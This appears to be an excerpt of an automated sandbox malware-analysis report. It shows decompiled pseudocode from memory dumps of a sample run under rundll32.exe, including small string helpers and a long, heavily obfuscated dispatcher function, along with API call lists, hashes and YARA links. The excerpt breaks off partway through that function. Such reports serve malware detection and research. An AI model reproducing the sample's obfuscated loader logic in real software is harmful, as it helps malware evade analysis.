Opcode Fuzzy Hash: 9d45025ce167f723db810f8cc23b9c466766c7643ddadc86585ea045713a2fc0
Instruction Fuzzy Hash: 02018F3222020EBBEF326FA89C44F9B7BBDFB84718F004425FA019A150EB75D554CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01372FFC, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E01372FFC(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E01375C4E(_t2);
				if(_t34 != 0) {
					_t30 = E01375C4E(_t28);
					if(_t30 == 0) {
						E01372A03(_t34);
					} else {
						_t39 = _a4;
						_t22 = E013779AC(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E013779AC(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x01372ffc
0x01373006
0x01373008
0x0137300e
0x0137300e
0x01373017
0x0137301b
0x01373027
0x0137302b
0x0137309f
0x0137302d
0x0137302d
0x01373031
0x01373038
0x0137303b
0x01373055
0x01373044
0x01373044
0x01373048
0x0137304b
0x01373050
0x01373050
0x0137305a
0x01373082
0x01373088
0x0137308b
0x0137305c
0x0137305e
0x01373066
0x01373071
0x01373076
0x01373076
0x01373092
0x01373099
0x0137309a
0x0137309a
0x0137302b
0x013730aa

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,013756E5,00000000,00000000,00000000,079E9698,?,?,01373B82,?,079E9698), ref: 01373008

Part of subcall function 01375C4E: RtlAllocateHeap.NTDLL(00000000,00000000,01373FAA), ref: 01375C5A

Part of subcall function 013779AC: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,01373036,00000000,00000001,00000001,?,?,013756E5,00000000,00000000,00000000,079E9698), ref: 013779BA
Part of subcall function 013779AC: StrChrA.SHLWAPI(?,0000003F,?,?,013756E5,00000000,00000000,00000000,079E9698,?,?,01373B82,?,079E9698,0000EA60,?), ref: 013779C4

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,013756E5,00000000,00000000,00000000,079E9698,?,?,01373B82), ref: 01373066
lstrcpy.KERNEL32(00000000,00000000), ref: 01373076
lstrcpy.KERNEL32(00000000,00000000), ref: 01373082

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 90ae019a4c18c11ee7a20b04dabd7b1f4c5310e133c0b0d17ca6114111d045a9
Instruction ID: bbaaae6931fb30fafdcdceaf7ffe65ab4bfe88ad05d374d585743c8129c72452
Opcode Fuzzy Hash: 90ae019a4c18c11ee7a20b04dabd7b1f4c5310e133c0b0d17ca6114111d045a9
Instruction Fuzzy Hash: 1021AF7250025AAFCB339F69CC88FAABFBCAF16298F054054F9069B215D739C904D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 01374DC8, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01374DC8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E01375C4E(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x01374ddd
0x01374de1
0x01374deb
0x01374df2
0x01374df5
0x01374df7
0x01374dff
0x01374e04
0x01374e12
0x01374e17
0x01374e21

APIs

lstrlenW.KERNEL32(004F0053,74E05520,?,00000008,079E932C,?,01374ABB,004F0053,079E932C,?,?,?,?,?,?,01371BD5), ref: 01374DD8
lstrlenW.KERNEL32(01374ABB,?,01374ABB,004F0053,079E932C,?,?,?,?,?,?,01371BD5), ref: 01374DDF

Part of subcall function 01375C4E: RtlAllocateHeap.NTDLL(00000000,00000000,01373FAA), ref: 01375C5A

memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,01374ABB,004F0053,079E932C,?,?,?,?,?,?,01371BD5), ref: 01374DFF
memcpy.NTDLL(74E069A0,01374ABB,00000002,00000000,004F0053,74E069A0,?,?,01374ABB,004F0053,079E932C), ref: 01374E12

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: f3a3bcc5fbe98d05d215e738a7a668955f5f46a0d7e8b06a40e009ddfd081c52
Instruction ID: 57de3727f8706ce513c8e5a5fde691f8b652a537e3a23098ab77a406970a5a1a
Opcode Fuzzy Hash: f3a3bcc5fbe98d05d215e738a7a668955f5f46a0d7e8b06a40e009ddfd081c52
Instruction Fuzzy Hash: E6F0FF76900119BFCF21DFA9CC44D9FBBACEF092587154066ED08D7101E775EA149BA0

Uniqueness

Uniqueness Score: -1.00%

Function 01372829, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(079E887A,00000000,00000000,00000000,01376328,00000000), ref: 01372839
lstrlen.KERNEL32(?), ref: 01372841

Part of subcall function 01375C4E: RtlAllocateHeap.NTDLL(00000000,00000000,01373FAA), ref: 01375C5A

lstrcpy.KERNEL32(00000000,079E887A), ref: 01372855
lstrcat.KERNEL32(00000000,?), ref: 01372860

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 3ccc35296f1cc7a2c2f832f231b36a5b8b430359be7a46ef38f9fe11fbe1182b
Instruction ID: a9e05c51a7bd74a39caa630ee4ebfa6886e7f6d42d33d2d58e0adf091eb6b85e
Opcode Fuzzy Hash: 3ccc35296f1cc7a2c2f832f231b36a5b8b430359be7a46ef38f9fe11fbe1182b
Instruction Fuzzy Hash: F8E09233901225A7C7325FA99C48D9FBBBCEF99765B04051AFA00D3104C7288805CBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4760 Parent PID: 5160 rundll32.exeCOMMON

Executed Functions

Function 04AF3F1C, Relevance: 8.0, APIs: 4, Instructions: 2012
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E04AF3F1C(signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi, signed int _a4, char _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v24;
				signed int _v32;
				signed int _v36;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _t1077;
				intOrPtr _t1079;
				signed int _t1080;
				signed int _t1081;
				signed int _t1082;
				signed int _t1083;
				signed int _t1084;
				void* _t1085;
				signed int _t1086;
				signed int _t1088;
				void* _t1090;
				signed int _t1092;
				signed int _t1095;
				void* _t1097;
				signed int _t1099;
				signed int _t1101;
				void* _t1103;
				signed int _t1104;
				signed int _t1110;
				signed int _t1115;
				void* _t1117;
				int _t1118;
				signed int _t1121;
				signed int _t1122;
				signed int _t1125;
				signed int _t1126;
				signed int _t1127;
				signed int _t1130;
				void* _t1131;
				intOrPtr _t1133;
				signed int _t1134;
				signed int _t1138;
				signed int _t1140;
				signed int _t1141;
				signed int _t1142;
				signed int _t1143;
				signed int _t1144;
				signed int _t1145;
				signed int _t1146;
				intOrPtr* _t1151;
				signed int _t1152;
				signed int _t1155;
				void* _t1157;
				intOrPtr _t1166;
				signed int _t1167;
				signed int _t1170;
				signed int _t1171;
				signed int _t1172;
				signed int _t1174;
				signed int _t1175;
				signed int _t1176;
				signed int _t1179;
				signed int _t1180;
				signed int _t1181;
				signed int _t1189;
				signed int _t1190;
				signed int _t1191;
				signed int _t1192;
				signed int _t1193;
				signed int _t1194;
				void* _t1195;
				signed int _t1198;
				signed int _t1200;
				signed int _t1201;
				intOrPtr _t1203;
				signed int _t1206;
				void* _t1208;
				signed int _t1209;
				signed int _t1210;
				void* _t1212;
				void* _t1214;
				signed int _t1215;
				signed int _t1217;
				void* _t1219;
				signed int _t1220;
				signed int _t1221;
				signed int _t1225;
				void* _t1227;
				intOrPtr _t1228;
				signed int _t1231;
				signed int _t1234;
				signed int _t1237;
				signed int _t1238;
				signed int _t1239;
				signed int _t1240;
				intOrPtr _t1243;
				signed int _t1244;
				signed int _t1247;
				signed int _t1248;
				signed int _t1255;
				signed int _t1258;
				void* _t1260;
				void* _t1262;
				signed int _t1263;
				intOrPtr _t1264;
				signed int _t1267;
				signed int _t1268;
				signed int _t1269;
				signed int _t1272;
				void* _t1281;
				void* _t1283;
				signed int _t1287;
				signed int _t1290;
				signed int _t1293;
				void* _t1295;
				signed int _t1296;
				signed int _t1297;
				signed int _t1299;
				signed int _t1302;
				signed int _t1303;
				signed int _t1305;
				signed int _t1306;
				signed int _t1307;
				signed int _t1309;
				signed int _t1310;
				int _t1311;
				signed int _t1312;
				signed int _t1317;
				signed int _t1323;
				signed int _t1332;
				signed int _t1342;
				signed int _t1347;
				signed int _t1351;
				signed int _t1353;
				void* _t1356;
				void* _t1357;
				void* _t1358;
				signed int _t1359;
				signed int _t1361;
				signed int _t1362;
				signed int _t1364;
				signed int _t1367;
				signed int _t1384;
				void* _t1387;
				void* _t1394;
				void* _t1402;
				signed int _t1403;
				void* _t1404;
				signed int _t1405;
				signed int _t1408;
				signed int _t1409;
				signed int _t1414;
				signed int _t1417;
				signed int _t1431;
				signed int _t1445;
				signed int _t1448;
				signed int _t1464;
				signed int _t1465;
				void* _t1470;
				signed int _t1483;
				signed int _t1493;
				signed int _t1496;
				signed int _t1499;
				signed int _t1501;
				void* _t1504;
				signed int _t1505;
				signed int _t1506;
				intOrPtr _t1507;
				signed int _t1510;
				void* _t1512;
				signed int _t1524;
				void* _t1529;
				signed int _t1540;
				signed int _t1568;
				void* _t1573;
				signed int _t1579;
				signed int _t1582;
				void* _t1584;
				signed int _t1586;
				signed int _t1589;
				signed int _t1591;
				signed int _t1594;
				void* _t1596;
				signed int _t1598;
				signed int _t1616;
				signed int _t1628;
				signed int _t1631;
				signed int _t1636;
				signed int _t1645;
				signed int _t1660;
				signed int _t1661;
				void* _t1664;
				signed int _t1667;
				void* _t1686;
				signed int _t1689;
				signed int _t1690;

				_t1579 = __esi;
				_t1491 = __edi;
				_t1399 = __edx;
				_t1294 = __ecx;
				_t1287 = __ebx;
				_push(__edi);
				 *_t1689 =  *_t1689 & 0x00000000;
				 *_t1689 =  *_t1689 | _t1660;
				_t1661 = _t1689;
				_t1690 = _t1689 + 0xfffffff8;
				if( *(__ebx + 0x41c03c) == 0) {
					_push(_v12);
					 *_t1690 = __ecx;
					_v12 = _v12 & 0x00000000;
					_push(_v12);
					 *_t1690 =  *_t1690 + __edx;
					_push(__ebx);
					_v24 = _v24 + 1;
					_v24 = _v24 - __ebx;
					_t1077 =  *((intOrPtr*)(__ebx + 0xa901c0))();
					_push(__edi);
					 *(__ebx + 0x41c03c) =  *(__ebx + 0x41c03c) & 0x00000000;
					 *(__ebx + 0x41c03c) =  *(__ebx + 0x41c03c) | __edi & 0x00000000 | _t1077;
					_pop(_t1491);
					_pop(_t1399);
					_pop(_t1294);
				}
				if( *((intOrPtr*)(_t1287 + 0x41c6e6)) == 0) {
					_v32 = _v32 & 0x00000000;
					_v32 = _v32 + _t1394;
					_t1077 =  *((intOrPtr*)(_t1287 + 0xa90138))(_t1661);
					if( *((intOrPtr*)(_t1287 + 0x41cd4e)) == 0) {
						_v12 = 0;
						_v36 = _v36 | _t1077;
						 *_t1690 =  *((intOrPtr*)(_t1287 + 0x41cf1b));
						_v44 =  *((intOrPtr*)(_t1287 + 0x41cba6));
						_v48 =  *((intOrPtr*)(_t1287 + 0x41c926));
						_v52 = 0x20;
						_t1579 = _v56;
						_v56 =  *((intOrPtr*)(_t1287 + 0x41c73d));
						_v60 =  *((intOrPtr*)(_t1287 + 0x41c59a));
						_t1573 = _t1491;
						_v64 =  *((intOrPtr*)(_t1287 + 0x41c8a2));
						_t1491 = _t1573;
						_push( *((intOrPtr*)(_t1287 + 0xa901bc))(_v48,  *_t1690, _t1287, _v44, _t1394, _t1579, _v12));
						_pop( *_t62);
						_push(_v12);
						_pop( *_t64);
						_t1077 = _t1661;
					}
					 *_t65 = _t1077;
					_push(_v12);
					_pop( *_t67);
					if( *(_t1287 + 0x41c60b) == 0) {
						_v36 =  *((intOrPtr*)(_t1287 + 0x41c6c5));
						_t1491 = _t1491;
						_t1077 =  *((intOrPtr*)(_t1287 + 0xa901b8))(0, _t1579);
						_v12 = _t1579;
						 *(_t1287 + 0x41c60b) =  *(_t1287 + 0x41c60b) & 0x00000000;
						 *(_t1287 + 0x41c60b) =  *(_t1287 + 0x41c60b) ^ _t1579 & 0x00000000 ^ _t1077;
						_t1579 = _v12;
					}
					_pop(_t1399);
					if( *(_t1287 + 0x41cce7) == 0) {
						_v12 = _v12 & 0x00000000;
						_v32 = _v32 + _t1399;
						_v36 =  *((intOrPtr*)(_t1287 + 0x41d242));
						_t1281 =  *_t1690;
						 *_t1690 =  *((intOrPtr*)(_t1287 + 0x41da28));
						_v44 = 0xef;
						_v48 =  *((intOrPtr*)(_t1287 + 0x41d6cc));
						_t1283 = _t1281;
						_v52 =  *((intOrPtr*)(_t1287 + 0x41c722));
						_t1686 = _t1661;
						_t1661 = _v56;
						_v56 =  *((intOrPtr*)(_t1287 + 0x41d0bd));
						_v60 =  *((intOrPtr*)(_t1287 + 0x41c5e7));
						_t1568 = _t1491;
						_t1077 =  *((intOrPtr*)(_t1287 + 0xa901bc))(_t1686, _t1283, _t1281, _t1287, _v36, _t1077, _v12);
						_v12 = _t1568;
						 *(_t1287 + 0x41cce7) = 0 ^ _t1077;
						_t1491 = _v12;
						_t1399 = _t1399;
					}
					_pop(_t1294);
					if( *((intOrPtr*)(_t1287 + 0x41ca71)) == 0) {
						 *_t1690 =  *_t1690 ^ _t1661;
						 *_t1690 =  *_t1690 ^ _t1294;
						_v32 = _t1399;
						_t1077 =  *((intOrPtr*)(_t1287 + 0xa90140))(_v12);
						 *_t101 = _t1077;
						_push(_v12);
						_pop( *_t103);
						_pop(_t1399);
						_t1294 = _t1661;
					}
				}
				if( *(_t1287 + 0x41cf03) == 0) {
					if( *(_t1287 + 0x41d173) == 0) {
						_v12 = 0;
						_push(_v12);
						 *_t1690 =  *_t1690 ^ _t1294;
						_v12 = _v12 & 0x00000000;
						_push(_v12);
						 *_t1690 =  *_t1690 + _t1399;
						_v24 =  *((intOrPtr*)(_t1287 + 0x41d0dd));
						_t1077 = GetProcessId(_t1491);
						 *(_t1287 + 0x41d173) = 0 ^ _t1077;
						_t1491 = 0;
						_pop(_t1399);
						_pop(_t1294);
					}
					if( *((intOrPtr*)(_t1287 + 0x41d932)) == 0) {
						if( *(_t1287 + 0x41c4b1) == 0) {
							_v12 = 0;
							 *_t1690 =  *_t1690 + _t1294;
							_v12 = _v12 & 0x00000000;
							 *_t1690 =  *_t1690 + _t1399;
							_v24 =  *((intOrPtr*)(_t1287 + 0x41c539));
							_t1077 =  *((intOrPtr*)(_t1287 + 0xa901c0))(_v12, _v12);
							 *(_t1287 + 0x41c4b1) =  *(_t1287 + 0x41c4b1) & 0x00000000;
							 *(_t1287 + 0x41c4b1) =  *(_t1287 + 0x41c4b1) ^ _t1491 & 0x00000000 ^ _t1077;
							_t1491 = _t1491;
							_t1399 = _t1077;
							_t1294 = _t1294;
						}
						_push(_t1399);
						 *_t1690 =  *_t1690 & 0x00000000;
						 *_t1690 =  *_t1690 | _t1294;
						if( *(_t1287 + 0x41d7f8) == 0) {
							 *_t1690 =  *_t1690 & 0x00000000;
							 *_t1690 =  *_t1690 | _t1399;
							_t1272 =  *((intOrPtr*)(_t1287 + 0xa90140))();
							_v12 = _t1294;
							 *(_t1287 + 0x41d7f8) = 0 ^ _t1272;
							_t1399 = _t1077;
						}
						 *_t1690 =  *_t1690 & 0x00000000;
						 *_t1690 =  *_t1690 ^ _t1399;
						 *_t1690 =  *_t1690 ^ _t1661;
						 *_t1690 =  *_t1690 + _t1287 + 0x41d814;
						_t1260 =  *((intOrPtr*)(_t1287 + 0xa90128))(_t1661, _t1661, _t1491);
						_v32 = _v32 - _t1491;
						_v32 = _v32 + _t1260;
						_v12 = 0;
						_v36 = _v36 | _t1287 + 0x0041d75b;
						_t1262 =  *((intOrPtr*)(_t1287 + 0xa90128))(_v12, _t1491);
						_pop(_t1384);
						_t1263 = _t1262 + _t1384;
						_v12 = _t1399;
						if((_t1384 & 0x00000000 | _t1399 & 0x00000000 ^  *(_t1287 + 0x41cb90)) > _t1263) {
							_v12 = 0;
							_v36 = _v36 | _t1287 + 0x0041d814;
							_v12 = _v12 & 0x00000000;
							 *_t1690 =  *_t1690 | _t1287 + 0x0041d75b;
							_t1263 =  *((intOrPtr*)(_t1287 + 0xa9012c))(_v12, _v12);
						}
						 *(_t1287 + 0x41c12c) =  *(_t1287 + 0x41c12c) & 0x00000000;
						 *(_t1287 + 0x41c12c) =  *(_t1287 + 0x41c12c) ^ (_t1661 - _v36 | _t1263);
						_t1661 = _t1661;
						_t1264 =  *((intOrPtr*)(_t1287 + 0xa901cc))();
						_v12 = _t1579;
						 *((intOrPtr*)(_t1287 + 0x41d932)) = _t1264;
						_t1579 = _v12;
						if( *(_t1287 + 0x41d41e) == 0) {
							_v36 =  *((intOrPtr*)(_t1287 + 0x41c854));
							_t1579 = _t1579;
							_t1269 =  *((intOrPtr*)(_t1287 + 0xa901c0))(_t1491);
							 *(_t1287 + 0x41d41e) =  *(_t1287 + 0x41d41e) & 0x00000000;
							 *(_t1287 + 0x41d41e) =  *(_t1287 + 0x41d41e) ^ (_t1661 ^  *_t1690 | _t1269);
							_t1661 = _t1661;
						}
						_pop(_t1483);
						if( *(_t1287 + 0x41d26d) == 0) {
							_v32 = _v32 & 0x00000000;
							_v32 = _v32 | _t1483;
							_t1268 =  *((intOrPtr*)(_t1287 + 0xa90140))();
							_v36 = _t1579;
							 *(_t1287 + 0x41d26d) = 0 ^ _t1268;
							_t1579 = 0;
							_t1483 = _t1491;
						}
						_pop(_t1387);
						_v12 = _v12 & 0x00000000;
						 *_t1690 =  *_t1690 + _t1387;
						_v12 = _v12 & 0x00000000;
						_v32 = _v32 ^ _t1483;
						_v36 = _t1287 + 0x41d100;
						 *_t1690 =  *_t1690 ^ _t1287;
						 *_t1690 =  *_t1690 | _t1287 + 0x0041d196;
						_t1267 =  *((intOrPtr*)(_t1287 + 0xa90130))(_v12, _v12, _v12);
						 *(_t1287 + 0x41d036) =  *(_t1287 + 0x41d036) & 0x00000000;
						 *(_t1287 + 0x41d036) =  *(_t1287 + 0x41d036) | _t1483 & 0x00000000 | _t1267;
						_t1399 = _t1483;
						_t1294 = _t1287;
					}
					_push(_v12);
					 *_t1690 = _t1294;
					_push(_v12);
					 *_t1690 = _t1399;
					if( *(_t1287 + 0x41c366) == 0) {
						_t1258 =  *((intOrPtr*)(_t1287 + 0xa90138))(_t1690);
						 *(_t1287 + 0x41c366) =  *(_t1287 + 0x41c366) & 0x00000000;
						 *(_t1287 + 0x41c366) =  *(_t1287 + 0x41c366) | _t1399 & 0x00000000 ^ _t1258;
						_t1399 = _t1399;
					}
					_v12 = _v12 & 0x00000000;
					_v24 = _v24 | _t1287 + 0x0041d554;
					_v12 = _v12 & 0x00000000;
					 *_t1690 =  *_t1690 + _t1287 + 0x41c52f;
					_t1206 =  *((intOrPtr*)(_t1287 + 0xa90128))(_v12, _v12);
					_v32 = _v32 - _t1491;
					_v32 = _v32 | _t1206;
					_v12 = _v12 & 0x00000000;
					_v36 = _v36 | _t1287 + 0x0041c1ae;
					_t1208 =  *((intOrPtr*)(_t1287 + 0xa90128))(_v12, _t1491);
					_pop(_t1351);
					_t1209 = _t1208 + _t1351;
					_v12 = _t1399;
					_t1353 = _t1351 & 0x00000000 ^ _t1399 & 0x00000000 ^  *(_t1287 + 0x41cef3);
					if(_t1353 > _t1209) {
						_v36 = _v36 & 0x00000000;
						_v36 = _v36 + _t1287 + 0x41c52f;
						_v12 = _v12 & 0x00000000;
						 *_t1690 =  *_t1690 + _t1287 + 0x41c1ae;
						_t1209 =  *((intOrPtr*)(_t1287 + 0xa9012c))(_v12, _t1353);
					}
					 *(_t1287 + 0x41c731) =  *(_t1287 + 0x41c731) & 0x00000000;
					 *(_t1287 + 0x41c731) =  *(_t1287 + 0x41c731) | _t1353 ^ _v36 | _t1209;
					_t1356 = _t1353;
					_t1210 =  *((intOrPtr*)(_t1287 + 0xa90128))();
					if( *(_t1287 + 0x41c1c3) == 0) {
						_v12 = _v12 & 0x00000000;
						_v36 = _v36 | _t1210;
						 *_t1690 =  *_t1690 & 0x00000000;
						 *_t1690 =  *_t1690 ^ _t1661;
						_t1255 =  *((intOrPtr*)(_t1287 + 0xa901cc))(_v12);
						_v12 = _t1491;
						 *(_t1287 + 0x41c1c3) =  *(_t1287 + 0x41c1c3) & 0x00000000;
						 *(_t1287 + 0x41c1c3) =  *(_t1287 + 0x41c1c3) | _t1491 ^ _v12 ^ _t1255;
						_t1491 = _v12;
						_t1210 = _t1356;
					}
					 *(_t1287 + 0x41d50c) =  *(_t1287 + 0x41d50c) & 0x00000000;
					 *(_t1287 + 0x41d50c) =  *(_t1287 + 0x41d50c) ^ (_t1579 - _v36 | _t1210);
					_t1628 = _t1579;
					_pop(_t1464);
					if( *((intOrPtr*)(_t1287 + 0x41c2e0)) == 0) {
						_v12 = 0;
						_v32 = _v32 + _t1464;
						_push( *((intOrPtr*)(_t1287 + 0xa90110))(_v12));
						_pop( *_t240);
						_push(_v12);
						_pop( *_t242);
						_pop(_t1464);
					}
					_v12 = _v12 & 0x00000000;
					_v32 = _v32 | _t1464;
					_v12 = _v12 & 0x00000000;
					_v36 = _v36 + _t1287 + 0x41c6f6;
					_t1212 =  *((intOrPtr*)(_t1287 + 0xa90128))(_v12, _v12);
					 *_t1690 = _t1212;
					_v12 = _v12 & 0x00000000;
					_v44 = _v44 ^ _t1287 + 0x0041d315;
					_t1214 =  *((intOrPtr*)(_t1287 + 0xa90128))(_v12, _v12);
					_pop(_t1357);
					_t1215 = _t1214 + _t1357;
					_push( *((intOrPtr*)(_t1287 + 0x41d9cc)));
					_pop( *_t258);
					_push(_v12);
					_pop(_t1358);
					if(_t1358 > _t1215) {
						_v12 = _v12 & 0x00000000;
						_v44 = _v44 ^ _t1287 + 0x0041c6f6;
						_v48 = _t1287 + 0x41d315;
						_t1215 =  *((intOrPtr*)(_t1287 + 0xa9012c))(_v12, _v12);
					}
					_v12 = _t1491;
					 *(_t1287 + 0x41d01f) =  *(_t1287 + 0x41d01f) & 0x00000000;
					 *(_t1287 + 0x41d01f) =  *(_t1287 + 0x41d01f) | _t1491 & 0x00000000 | _t1215;
					_t1540 = _v12;
					if( *((intOrPtr*)(_t1287 + 0x41c657)) == 0) {
						if( *((intOrPtr*)(_t1287 + 0x41d1b3)) == 0) {
							_v44 =  *((intOrPtr*)(_t1287 + 0x41d657));
							_push( *((intOrPtr*)(_t1287 + 0xa90134))(_t1215, _t1661));
							_pop( *_t278);
							_push(_v12);
							_pop( *_t280);
						}
						_t1247 =  *((intOrPtr*)(_t1287 + 0xa90140))();
						if( *(_t1287 + 0x41c3b9) == 0) {
							_v44 = _t1247;
							_t1540 = _v48;
							_v48 =  *((intOrPtr*)(_t1287 + 0x41cadc));
							_t1248 =  *((intOrPtr*)(_t1287 + 0xa901c0))(_v12);
							 *(_t1287 + 0x41c3b9) =  *(_t1287 + 0x41c3b9) & 0x00000000;
							 *(_t1287 + 0x41c3b9) =  *(_t1287 + 0x41c3b9) | _t1464 & 0x00000000 ^ _t1248;
							_t1464 = _t1464;
							_t1247 = _t1540;
						}
						_v12 = _t1540;
						 *((intOrPtr*)(_t1287 + 0x41c657)) = _t1247;
						_t1540 = _v12;
					}
					_t1661 = _v44;
					_v44 =  *((intOrPtr*)(_t1287 + 0x41cbe7));
					_v48 = _v48 & 0x00000000;
					_v48 = _v48 + _t1287 + 0x41d35a;
					_t1217 =  *((intOrPtr*)(_t1287 + 0xa90128))(_t1628, _t1661);
					_v52 = _v52 - _t1628;
					_v52 = _t1217;
					_v56 = _t1287 + 0x41d8fe;
					_t1219 =  *((intOrPtr*)(_t1287 + 0xa90128))(_v12, _t1628);
					_pop(_t1359);
					_t1220 = _t1219 + _t1359;
					_v12 = _t1628;
					_t1361 = _t1359 & 0x00000000 | _t1628 & 0x00000000 ^  *(_t1287 + 0x41d577);
					_t1631 = _v12;
					if(_t1361 > _t1220) {
						_v56 = _v56 - _t1287;
						_v56 = _t1287 + 0x41d35a;
						_v60 = _v60 & 0x00000000;
						_v60 = _v60 ^ _t1287 + 0x0041d8fe;
						_t1220 =  *((intOrPtr*)(_t1287 + 0xa9012c))(_t1661, _t1287);
					}
					_v12 = _t1540;
					 *(_t1287 + 0x41c81f) =  *(_t1287 + 0x41c81f) & 0x00000000;
					 *(_t1287 + 0x41c81f) =  *(_t1287 + 0x41c81f) | _t1540 & 0x00000000 | _t1220;
					_t1491 = _v12;
					_t1221 = GetProcessId(??);
					if( *(_t1287 + 0x41c57a) == 0) {
						if( *(_t1287 + 0x41d60f) == 0) {
							_v52 = _t1221;
							_v56 =  *((intOrPtr*)(_t1287 + 0x41cb00));
							_t1631 = _t1631;
							_t1244 =  *((intOrPtr*)(_t1287 + 0xa90138))(_v12);
							_v12 = _t1491;
							 *(_t1287 + 0x41d60f) =  *(_t1287 + 0x41d60f) & 0x00000000;
							 *(_t1287 + 0x41d60f) =  *(_t1287 + 0x41d60f) | _t1491 & 0x00000000 | _t1244;
							_t1491 = _v12;
							_t1221 = _t1661;
						}
						_push(_t1464);
						_v52 = _v52 - _t1464;
						_v52 = _t1221;
						if( *((intOrPtr*)(_t1287 + 0x41d192)) == 0) {
							_v56 =  *((intOrPtr*)(_t1287 + 0x41d87c));
							_v60 = 0x99;
							_v64 = _v64 + 0xfd;
							_v64 = _v64 - _t1631;
							_v68 =  *((intOrPtr*)(_t1287 + 0x41c36a));
							_t1631 = _t1631;
							_v72 =  *((intOrPtr*)(_t1287 + 0x41ce50));
							_t1661 = _v76;
							_v76 =  *((intOrPtr*)(_t1287 + 0x41c4b9));
							_t1243 =  *((intOrPtr*)(_t1287 + 0xa901bc))(0, _t1661, _t1221, _t1464, _t1631, _t1661, _t1491);
							_v12 = _v56;
							 *((intOrPtr*)(_t1287 + 0x41d192)) = _t1243;
							_t1491 = _v12;
						}
						_t1238 =  *((intOrPtr*)(_t1287 + 0xa90140))();
						_v12 = _t1491;
						 *(_t1287 + 0x41c57a) =  *(_t1287 + 0x41c57a) & 0x00000000;
						 *(_t1287 + 0x41c57a) =  *(_t1287 + 0x41c57a) | _t1491 & 0x00000000 | _t1238;
						_t1491 = _v12;
						if( *(_t1287 + 0x41d8c7) == 0) {
							_t1661 = _v56;
							_v56 =  *((intOrPtr*)(_t1287 + 0x41da06));
							_t1240 =  *((intOrPtr*)(_t1287 + 0xa901c0))(_t1661);
							_v12 = _t1464;
							 *(_t1287 + 0x41d8c7) =  *(_t1287 + 0x41d8c7) & 0x00000000;
							 *(_t1287 + 0x41d8c7) =  *(_t1287 + 0x41d8c7) | _t1464 ^ _v12 | _t1240;
						}
						_pop(_t1221);
						if( *(_t1287 + 0x41c07c) == 0) {
							_v12 = _v12 & 0x00000000;
							_v52 = _v52 + _t1221;
